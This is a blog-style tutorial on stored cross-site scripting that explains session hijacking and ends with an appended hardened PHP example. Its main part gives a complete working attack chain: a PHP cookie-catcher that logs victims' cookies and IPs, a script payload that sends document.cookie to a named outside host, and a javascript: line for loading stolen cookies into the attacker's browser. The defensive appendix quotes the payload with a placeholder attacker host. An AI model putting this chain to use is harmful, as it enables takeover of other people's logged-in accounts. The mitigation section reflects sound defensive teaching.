Disclaimer: The article below is written for educational purposes only. Its whole purpose is to make people aware of security threats, and we trust that you agree the information will not be used for illegal purposes.
==================
Hi guys, this article is all about the XSS attack. Recent studies have found that this type of attack is responsible for about 40% of the websites that were hacked (2007-2010). The reason behind this is poor input validation, or no validation at all.
A small vulnerability can lead to a huge loss, and input from a user must always be processed before it is allowed to act or be stored.
XSS stands for Cross Site Scripting. I know what you are thinking: if it is Cross Site Scripting, why is it abbreviated as XSS and not CSS? Well, the answer to this obvious question is very simple. CSS is already used for Cascading Style Sheets, so to avoid confusion it has been named XSS.
XSS has many variants. As far as I have analyzed, XSS attacks are carried out on different sites with different methods, but the whole logical funda behind it remains the same: the attacker hosts supporting scripts on another website, then exploits an input validation vulnerability on the target and attacks.
To your surprise and interest, let me tell you that not even websites like Myspace, Facebook, Orkut, Google etc. have been spared from this attack.
In mid 2009 a lot of Orkut users complained that scraps were being written from their account even when they had chosen the strongest password they could think of. They claimed that their account had been hacked.
Well, they were right up to some extent. Actually it was not the account password that was being hacked, it was the logged-in SESSION.
Another question: how can a session be hacked when it is usually generated by a very strong algorithm? Or does it mean that some people came to know how to generate sessions based on the usernames?
Scratching your head?????? Stop that habit.
Well, as our topic is XSS, obviously the answer to this is related to XSS. It is the XSS attack.
Now what is this attack and how were hackers doing it?
Okay, now enough questions and theories, let's begin with the logic.
First of all let me tell you that when we log in to a website, most websites store the logged-in information in cookies, and these cookies are stored on our machine by our browser (the site asks the browser to do so, so that navigation is controlled via a generated session and the user can be identified uniquely).
To check, log in to some website and type this script in the URL bar: javascript:alert(document.cookie); and your cookie related to that site will pop up (your browser should support JavaScript; well, almost all do).
Let's think from an evil mind now. Suppose someone copies your cookies, places them on his machine and refreshes the browser window. What will happen? Yes, if that website is XSS vulnerable, you will see that you got the authentication of the account whose cookies you had copied.
Cool, isn't it? But now how to copy a cookie of someone else, as we have no access to the hard drive of that user, and we don't see a copy cookie button either, haha.
Here comes the vulnerability part. Some websites were not validating the user input and were directly placing the text into the page. In simple words, suppose I write a JavaScript and post it in someone's scrapbook. Whenever the user opens his/her scrapbook, that JavaScript will execute.
Does that scare you? Well, it did scare some people when they came to know that their session was being hacked.
Stay calm, let's learn more about this. How can a JavaScript extract the cookie of a website? I think I answered this question already: yeah, document.cookie is the answer.
Umm... okay, I know how to pop up my own cookie, but what about others, and how on earth will I get someone else's cookie?
Let's create a cookie catcher script. Our script will be written in PHP and hosted on some other website which allows hosting PHP scripts.
===========A simple Cookie Catcher Script=============
<?php
$cookie = $_GET['c'];
$ip = getenv('REMOTE_ADDR');
$date = date("j F, Y, g:i a");
$referer = getenv('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: '.$ip.'<br> Date and Time: '.$date.'<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header("Location: http://www.google.com"); // or send back to referer to hide this fact
?>
======================end of code===================
Suppose the hosted address of this script is http://www.depinderbharti.com/cookie.php
Let's write a scrapbook/forum/injection entry with this code:
====================exploitation Code(Cookie Sender)======================
<script>
document.location = "http://www.depinderbharti.com/cookie.php?c=" + document.cookie;
</script>
=================end of code====================================
Now whoever opens this page will be redirected to the cookie catcher script's location, and later on will be redirected back to some other page (based on what URL you wrote in the script).
Meanwhile the cookies will be copied from his/her system and will reach the cookie catcher script.
The cookies will then be stored in the cookies.html webpage by the cookie catcher script.
Now that we have the cookies of a user, how do we merge them into our local system cookies?
Copy the cookies and execute the code below in your web browser's URL box.
======================Merging in local======================
javascript:void(document.cookie="paste those copied cookies here")   (then hit enter)
==================end of code========================
Now simply open that attacked website, www.blabla.com, and you will see that you are logged in.
So next time you browse the internet, look at the webpages and their redirections properly.
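The whole chain above works only because the scrapbook echoes user input into the page unencoded and the session cookie is readable from JavaScript. Below is an added example (my own, not code from the article) of a hardened PHP scrapbook page that closes both holes; the attacker host name is a placeholder and the scraps are constructed sample input. It assumes PHP 7.3 or later for the array form of session_set_cookie_params.

```php
<?php
// Added example (not from the original article): a hardened "scrapbook" page.
// Two defences against the cookie-theft chain described in the article:
//  1. mark the session cookie HttpOnly so document.cookie cannot read it;
//  2. HTML-encode user-supplied scraps on output so an injected <script> tag
//     is displayed as text instead of executed.

// 1. Session cookie flags. Must be called before session_start().
//    Array form requires PHP 7.3+ (assumption stated in the lead-in).
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,   // only sent over HTTPS
    'httponly' => true,   // not exposed to document.cookie
    'samesite' => 'Lax',  // not sent on cross-site top-level POSTs
]);
session_start();

// Constructed sample scraps: the second one is the article's payload, with the
// real host replaced by a placeholder (attacker.example).
$scraps = [
    'Hi, nice profile!',
    '<script>document.location="http://attacker.example/cookie.php?c=" + document.cookie;</script>',
];

// 2. Encode for an HTML text context. ENT_QUOTES also escapes single and
//    double quotes, which matters if the value ever lands inside an attribute;
//    always pass the charset explicitly so the encoder and the page agree.
function render_scrap(string $scrap): string
{
    return '<p>' . htmlspecialchars($scrap, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

header('Content-Type: text/html; charset=UTF-8');

// VULNERABLE form the article describes (do not use):
//     echo '<p>' . $scrap . '</p>';
// Hardened form: every scrap passes through render_scrap() on output, so the
// injected <script> tag reaches the browser as inert text and never runs.
foreach ($scraps as $scrap) {
    echo render_scrap($scrap), "\n";
}
```

Output encoding is applied when the scrap is rendered, not when it is stored, so a scrap saved before the fix is still neutralised the next time the page is viewed.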
================